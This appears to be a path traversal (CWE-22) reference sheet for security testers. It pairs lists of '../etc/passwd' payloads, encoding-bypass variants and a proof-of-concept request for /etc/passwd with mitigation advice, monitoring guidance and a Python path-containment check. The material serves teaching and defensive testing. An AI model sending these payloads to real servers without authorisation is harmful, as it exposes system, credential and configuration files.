🧠 Description

What is Path Traversal?

Path Traversal (also known as Directory Traversal) allows attackers to access files outside the web root folder by using "../" sequences. This can expose sensitive files on the server.

Path Traversal allows attackers to:
  • Read sensitive system files
  • Access configuration files
  • Read source code
  • Access password hashes
  • Read log files

🏷️ Classification

  • Type: Path Traversal (CWE-22)
  • OWASP: A01:2021 - Broken Access Control
  • Variants: Local File Inclusion, Remote File Inclusion

🎯 Attack Surface

  • ✅ File download features
  • ✅ Image viewers
  • ✅ Document viewers
  • ✅ Load balancing features
  • ✅ Template systems

⚠️ Preconditions

  • Application uses file paths in parameters
  • No proper validation of path input
  • File access not restricted to web root

🔍 Detection

Test Payloads:

  • ../etc/passwd
  • ..%2F..%2F..%2Fetc%2Fpasswd
  • ....//....//....//etc/passwd

🔧 Burp Workflow

  1. Identify file path parameters
  2. Inject ../ sequences
  3. Test for file access
  4. Escalate to sensitive files

⚙️ Tool Automation

  • DotDotPwn: Path traversal fuzzer
  • Burp: Intruder with payloads

💣 Basic Payloads

../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
..\..\..\Windows\win.ini
%2e%2e/etc/passwd

🚀 Advanced Payloads

Encoding Bypass
..%252f..%252f..%252fetc/passwd
..%c0%af..%c0%af..%c0%afetc/passwd
..%c0%2f..%c0%2f..%c0%2fetc/passwd

📝 Proof of Concept

# Request
GET /download?file=../../etc/passwd HTTP/1.1
Host: target.com

# Response - shows passwd file content!

💥 Impact

Severity: HIGH (CVSS 7.5)
  • Read sensitive files
  • Source code disclosure
  • Configuration exposure

🛡️ Mitigation

✅ Validate Paths: Ensure path is within allowed directory

✅ Use Index: Use file IDs instead of paths

✅ Chroot: Jail file access to web root

🏰 Advanced Mitigation

  • Implement allowlist of permitted files
  • Use realpath() to canonicalize paths
  • Restrict file access to web root
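The path validation recommended above (join, canonicalize with realpath(), then check containment), as an added example that is not part of the original page; the temporary directory layout and the file names it creates are constructed for the demonstration:

```python
import os
import tempfile
from typing import Dict, Optional


def resolve_within(base_dir: str, user_path: str) -> Optional[str]:
    """Return the canonical path of user_path under base_dir, or None if it escapes.

    Canonicalize *after* joining so that "..", doubled separators and symbolic
    links are all resolved before the containment check. No stripping of "../"
    is done: stripping is what the "....//" payloads are designed to defeat.
    """
    base = os.path.realpath(base_dir)
    # An absolute user_path makes os.path.join discard base entirely;
    # realpath then canonicalizes it and the prefix test below rejects it.
    candidate = os.path.realpath(os.path.join(base, user_path))
    # Separator-aware prefix test: a bare startswith(base) would accept
    # "/srv/files_private/x" for base "/srv/files".
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None


def safe_read(base_dir: str, user_path: str) -> Optional[bytes]:
    """Read a file only if it resolves to a regular file inside base_dir."""
    path = resolve_within(base_dir, user_path)
    if path is None or not os.path.isfile(path):
        return None
    with open(path, "rb") as fh:
        return fh.read()


def demo() -> Dict[str, Optional[bytes]]:
    """Exercise the check against a constructed tree (assumption: a temporary
    'files' folder stands in for the application's download directory)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "files")
        os.mkdir(root)
        with open(os.path.join(root, "report.pdf"), "wb") as fh:
            fh.write(b"public report")
        with open(os.path.join(tmp, "secret.txt"), "wb") as fh:
            fh.write(b"outside web root")
        # A symlink inside the folder that points outside: realpath follows it.
        os.symlink(os.path.join(tmp, "secret.txt"), os.path.join(root, "link.txt"))
        attempts = {
            "legit": "report.pdf",
            "dotdot": "../secret.txt",
            "nested": "....//secret.txt",
            "absolute": os.path.join(tmp, "secret.txt"),
            "symlink": "link.txt",
        }
        return {label: safe_read(root, p) for label, p in attempts.items()}
```

Run the check on the value the application actually hands to the filesystem, after the framework has URL-decoded it; encoding tricks only matter when a filter inspects the raw parameter instead of the resolved path.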

📊 Monitoring

  • Alert on ../ in parameters
  • Monitor for sensitive file access

🔐 Security Controls

Control           Implementation
Path Validation   Check path is within allowed directory
File IDs          Use IDs instead of paths

🛠️ Tools

  • DotDotPwn: Fuzzer
  • Burp: Intruder

📚 References

🔄 Retest

Step   Action
1      Add path validation
2      Re-test with ../

⚙️ Detection

  • Static: Find file operations without validation
  • Dynamic: Fuzz with ../

🔎 Threat-Hunting

IOCs: ../ sequences in logs, sensitive file access.

🛡️ Defensive

WAF with path traversal rules.